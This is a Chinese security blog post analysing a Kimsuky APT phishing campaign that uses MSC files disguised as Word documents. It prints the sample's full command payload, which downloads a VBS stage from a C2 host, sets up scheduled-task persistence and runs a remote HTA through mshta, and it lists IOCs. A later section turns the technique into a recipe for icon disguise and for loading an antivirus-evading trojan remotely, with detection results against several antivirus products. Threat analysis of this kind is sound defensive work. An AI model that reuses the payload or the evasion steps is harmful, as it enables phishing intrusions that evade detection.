从APT组织Kimsuky的MSC攻击样本到免杀伪装

admin
admin
admin
139018
文章
114
评论
2024年12月19日17:55:08评论77 views字数 3899阅读12分59秒阅读模式
从APT组织Kimsuky的MSC攻击样本到免杀伪装

背景

01

在微软将互联网来源文档的Office宏默认禁用后,攻击者开始转向其他攻击手法,例如JavaScript、MSI文件、LNK对象和ISO文件。然而,这些技术也受到防御者的密切关注,被发现的可能性很高。所以攻击者会寻求利用新的或未公开的攻击向量,以在规避防御措施的同时获取访问权限。一个最近的例子是朝鲜APT组织Kimsuky利用MSC文件中新的命令执行技术。

该技术允许攻击者在用户点击精心构造的MSC文件后,在mmc.exe的上下文中获得完全的代码执行权限。首个利用GrimResource的样本于6月6日上传至VirusTotal。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

什么是MMC

02

Microsoft管理控制台
英文称呼为:Microsoft Management Console (MMC) ,是Microsoft Windows 操作系统的一个组件,它提供了一个界面,允许系统管理员和高级用户配置和监控系统。MMC 最初于 1998 年随 Windows NT 4.0 的 Option Pack 发布,后来与 Windows 2000 及其后续版本捆绑在一起。
文件后缀(.msc

看到这个后缀,大家可能已经想到了组策略编辑器(gpedit.msc),按下 Win + R 组合键,输入 gpedit.msc,按回车键即可打开。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

样本分析

03

攻击流程图:
从APT组织Kimsuky的MSC攻击样本到免杀伪装

攻击流程大致分为以下几个步骤:

01

初始投递阶段

从APT组织Kimsuky的MSC攻击样本到免杀伪装
攻击者通过Facebook Messenger发送一个URL链接。
● 链接指向OneDrive,诱导受害者下载一个伪装的文件。

● 文件伪装成MS Word文档,但实际上是一个MSC文件(Microsoft Management Console 文件),图标也被伪装成Word文档以欺骗用户。

02

恶意文件执行

从APT组织Kimsuky的MSC攻击样本到免杀伪装
● 当受害者打开该MSC文件时,实际上触发了Microsoft Management Console
● 通过调用cmd.exe,执行一系列恶意命令,开始进一步的恶意活动。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

03

C2通信与指令执行

从APT组织Kimsuky的MSC攻击样本到免杀伪装
● 文件与C2服务器(brandwizer[.]co[.]in) 建立连接,C2服务器下发指令,控制后续操作。
● 当点击Open按钮时,会访问C2服务器的”/share”路径,返回包会重定向到一个Google Docs链接,该链接为一个诱饵文件(Essay on Resolution of Korean Forced Labor Claims.docx),使其看起来像正常行为,进一步欺骗受害者,掩盖恶意行为。
● 使用echo 将msc文件中的恶意代码写入到warm.vbs文件中。
● 使用 schtasks(Windows任务计划程序)创建一个名为OneDriveUpdate的任务,保持41分钟的周期执行,确保恶意代码的持久化。
从APT组织Kimsuky的MSC攻击样本到免杀伪装
/c mode 15,1& start explorer "https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/share"&echo On Error Resume Next:Set ws = CreateObject("WScript.Shell"):Set fs = CreateObject("Scripting.FileSystemObject"):Set Post0 = CreateObject("msxml2.xmlhttp"):gpath = ws.ExpandEnvironmentStrings("%appdata%") + "Microsoftcool.gif":bpath = ws.ExpandEnvironmentStrings("%appdata%") + "Microsoftcool.bat":If fs.FileExists(gpath) Then:re=fs.movefile(gpath,bpath):re=ws.run(bpath,0,true):fs.deletefile(bpath):Else:Post0.open "GET","https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/d.php?na=battmp",False: Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded":Post0.Send:t0=Post0.responseText:Set f = fs.CreateTextFile(gpath,True):f.Write(t0):f.Close:End If: > "C:UsersPublicmusicwarm.vbs"&schtasks /create /tn OneDriveUpdate /tr "wscript.exe /b "C:UsersPublicmusicwarm.vbs"" /sc minute /mo 41 /f&start /min mshta https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/ttt.hta

04

信息窃取和持久化

从APT组织Kimsuky的MSC攻击样本到免杀伪装

(类似ReconShark 恶意软件家族)

●ReconShark 的主要功能是窃取受害者的相关信息,例如正在运行的进程、有关连接到系统的电池的信息以及部署的终端威胁检测机制。
●warm.vbs下载“d.php?na=battmp”中的文件到cool.gif文件中,并重命名为cool.bat执行。
●使用mshta远程加载ttt.hta脚本文件。
●脚本内部加载了 temp.vbs 文件,用于收集系统信息、是否存在防病毒软件进程等操作。
从APT组织Kimsuky的MSC攻击样本到免杀伪装
●ReconShark 恶意软件将收集的信息存储在字符串变量中,然后通过发出 HTTP POST 请求将其上传到 C2 服务器。
从APT组织Kimsuky的MSC攻击样本到免杀伪装

●通过对C2服务器(r.php)路径发送电池状态和进程信息等内容。

05

持续通信与指令下发

从APT组织Kimsuky的MSC攻击样本到免杀伪装
●攻击者继续通过C2服务器下发指令,例如 d.php?na=battmp。
●脚本进一步利用 cmd.exe 执行命令,扩展恶意活动。
从APT组织Kimsuky的MSC攻击样本到免杀伪装

攻击总结

04

从APT组织Kimsuky的MSC攻击样本到免杀伪装

初始入口

通过社工钓鱼(Facebook Messenger + OneDrive链接)引诱用户下载文件。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

文件伪装

利用MSC文件伪装成Word文档,诱骗用户执行。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

C2服务器

通过C2与目标系统通信,下载进一步恶意脚本和指令。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

信息窃取

收集系统电池状态和运行进程信息。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

持久化

利用Windows任务计划程序(schtasks)创建定时任务。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

隐蔽性

诱饵文件和脚本结合Google Docs链接,降低用户怀疑。

从APT组织Kimsuky的MSC攻击样本到免杀伪装

免杀伪装实现

05

目前利用可执行文件进行钓鱼攻击,常见的方法有:自解压压缩包+文件名翻转、文件捆绑+超长空格、link快捷方式等等,但这些方法早已被国内外杀毒软件标记,然而.msc文件平时并不常见,并且通过内嵌word等图片,打开文件之后更具有迷惑性
从APT组织Kimsuky的MSC攻击样本到免杀伪装

样本无害化处理

06

从APT组织Kimsuky的MSC攻击样本到免杀伪装
研究人员提到,更换图标是修改以下代码,但替换新的文件路径后,msc文件的图标并没有改变。
<VisualAttributes><String Name="ApplicationTitle" ID="10"/><Icon Index="0" File="C:Program FilesMicrosoft OfficerootOffice16WINWORD.EXE"><Image Name="Large" BinaryRefIndex="0"/><Image Name="Small" BinaryRefIndex="1"/><Image Name="Large48x" BinaryRefIndex="2"/></Icon></VisualAttributes>
查看msc源码发现,图标信息被保存在msc文件中,以图片二进制的base64或其他编码后的形式存在,这部分代码使用正常的base64编码后的图片替换无效
从APT组织Kimsuky的MSC攻击样本到免杀伪装
经过测试,正确的修改方法是:
打开msc文件,点击”文件”>“选项”
从APT组织Kimsuky的MSC攻击样本到免杀伪装
更改图标
从APT组织Kimsuky的MSC攻击样本到免杀伪装
选择一个带图标的二进制文件进行替换
从APT组织Kimsuky的MSC攻击样本到免杀伪装
确定后点击应用
从APT组织Kimsuky的MSC攻击样本到免杀伪装
pdf文件的icon修改方法:
将下列标签中的二进制信息复制到最后一个<Binary></Binary>标签中,替换掉原来的内容。
<Binary Name="CONSOLE_FILE_ICON_LARGE">
更改图标之后的效果:

从APT组织Kimsuky的MSC攻击样本到免杀伪装

从APT组织Kimsuky的MSC攻击样本到免杀伪装

远程加载

07

编辑msc文件,将执行cmd参数部分替换为我们要远程加载的免杀木马

从APT组织Kimsuky的MSC攻击样本到免杀伪装

从APT组织Kimsuky的MSC攻击样本到免杀伪装

最终效果

08

火绒
从APT组织Kimsuky的MSC攻击样本到免杀伪装
Windows Defender
从APT组织Kimsuky的MSC攻击样本到免杀伪装
360(会拦截mmc进程)

从APT组织Kimsuky的MSC攻击样本到免杀伪装

从APT组织Kimsuky的MSC攻击样本到免杀伪装

参考链接

09

https://www.genians.co.kr/blog/threat_intelligence/facebook 
https://learn.microsoft.com/zh-cn/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console 

从APT组织Kimsuky的MSC攻击样本到免杀伪装

IOC

10

MD5

  • 56fa059cf7dc562ce0346b943e8f58bb

  • b5080c0d123ce430f1e28c370a0fa18b

  • e86a24d9f3a42bbb8edc0ca1f8b3715c

  • a12757387f178a0ec092fb5360e4f473

  • 75ec9f68a5b62705c115db5119a78134

原文始发于微信公众号(矢安科技):从APT组织Kimsuky的MSC攻击样本到免杀伪装

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月19日17:55:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从APT组织Kimsuky的MSC攻击样本到免杀伪装https://cn-sec.com/archives/3527368.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息